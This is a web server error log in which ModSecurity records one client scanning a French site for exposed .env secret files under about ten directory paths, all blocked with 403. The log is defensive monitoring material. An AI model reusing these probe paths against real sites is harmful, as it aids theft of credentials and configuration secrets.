[Mon May 11 14:10:13.674070 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/erp/.env"] [unique_id "agHHJeJEyNRN152ArORzcgAAAFI"]
[Mon May 11 14:10:13.674283 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/erp/.env"] [unique_id "agHHJeJEyNRN152ArORzcgAAAFI"]
[Mon May 11 14:10:13.674591 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/erp/.env"] [unique_id "agHHJeJEyNRN152ArORzcgAAAFI"]
[Mon May 11 14:10:13.938566 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/shop/.env"] [unique_id "agHHJeJEyNRN152ArORzcwAAAFI"]
[Mon May 11 14:10:13.938932 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/shop/.env"] [unique_id "agHHJeJEyNRN152ArORzcwAAAFI"]
[Mon May 11 14:10:13.939119 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/shop/.env"] [unique_id "agHHJeJEyNRN152ArORzcwAAAFI"]
[Mon May 11 14:10:13.939383 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/shop/.env"] [unique_id "agHHJeJEyNRN152ArORzcwAAAFI"]
[Mon May 11 14:10:14.052890 2026] [security2:error] [pid 1319998:tid 1320012] [client 43.133.69.37:51014] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nearoo.fr"] [uri "/"] [unique_id "agHHJqt2WtvoFr7xvGy9LwAAAIw"]
[Mon May 11 14:10:14.228954 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/store/.env"] [unique_id "agHHJuJEyNRN152ArORzdAAAAFI"]
[Mon May 11 14:10:14.229348 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/store/.env"] [unique_id "agHHJuJEyNRN152ArORzdAAAAFI"]
[Mon May 11 14:10:14.229545 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/store/.env"] [unique_id "agHHJuJEyNRN152ArORzdAAAAFI"]
[Mon May 11 14:10:14.229796 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/store/.env"] [unique_id "agHHJuJEyNRN152ArORzdAAAAFI"]
[Mon May 11 14:10:14.499900 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/saas/.env"] [unique_id "agHHJuJEyNRN152ArORzdQAAAFI"]
[Mon May 11 14:10:14.500342 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/saas/.env"] [unique_id "agHHJuJEyNRN152ArORzdQAAAFI"]
[Mon May 11 14:10:14.500532 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/saas/.env"] [unique_id "agHHJuJEyNRN152ArORzdQAAAFI"]
[Mon May 11 14:10:14.500798 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/saas/.env"] [unique_id "agHHJuJEyNRN152ArORzdQAAAFI"]
[Mon May 11 14:10:14.799771 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/client/.env"] [unique_id "agHHJuJEyNRN152ArORzdgAAAFI"]
[Mon May 11 14:10:14.800150 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/client/.env"] [unique_id "agHHJuJEyNRN152ArORzdgAAAFI"]
[Mon May 11 14:10:14.800350 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/client/.env"] [unique_id "agHHJuJEyNRN152ArORzdgAAAFI"]
[Mon May 11 14:10:14.800605 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/client/.env"] [unique_id "agHHJuJEyNRN152ArORzdgAAAFI"]
[Mon May 11 14:10:15.113181 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/project/.env"] [unique_id "agHHJ-JEyNRN152ArORzeAAAAFI"]
[Mon May 11 14:10:15.113624 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/project/.env"] [unique_id "agHHJ-JEyNRN152ArORzeAAAAFI"]
[Mon May 11 14:10:15.113819 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/project/.env"] [unique_id "agHHJ-JEyNRN152ArORzeAAAAFI"]
[Mon May 11 14:10:15.114130 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/project/.env"] [unique_id "agHHJ-JEyNRN152ArORzeAAAAFI"]
[Mon May 11 14:10:15.447686 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/admin-panel/.env"] [unique_id "agHHJ-JEyNRN152ArORzeQAAAFI"]
[Mon May 11 14:10:15.448126 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/admin-panel/.env"] [unique_id "agHHJ-JEyNRN152ArORzeQAAAFI"]
[Mon May 11 14:10:15.448369 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/admin-panel/.env"] [unique_id "agHHJ-JEyNRN152ArORzeQAAAFI"]
[Mon May 11 14:10:15.448661 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/admin-panel/.env"] [unique_id "agHHJ-JEyNRN152ArORzeQAAAFI"]
[Mon May 11 14:10:15.489006 2026] [core:error] [pid 1319953:tid 1319965] [client 52.242.216.199:21663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:15.489043 2026] [core:error] [pid 1319953:tid 1319965] [client 52.242.216.199:21663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:15.713644 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/control-panel/.env"] [unique_id "agHHJ-JEyNRN152ArORzegAAAFI"]
[Mon May 11 14:10:15.714033 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/control-panel/.env"] [unique_id "agHHJ-JEyNRN152ArORzegAAAFI"]
[Mon May 11 14:10:15.714234 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/control-panel/.env"] [unique_id "agHHJ-JEyNRN152ArORzegAAAFI"]
[Mon May 11 14:10:15.714582 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/control-panel/.env"] [unique_id "agHHJ-JEyNRN152ArORzegAAAFI"]
[Mon May 11 14:10:16.027839 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/user-panel/.env"] [unique_id "agHHKOJEyNRN152ArORzewAAAFI"]
[Mon May 11 14:10:16.028233 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/user-panel/.env"] [unique_id "agHHKOJEyNRN152ArORzewAAAFI"]
[Mon May 11 14:10:16.028416 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/user-panel/.env"] [unique_id "agHHKOJEyNRN152ArORzewAAAFI"]
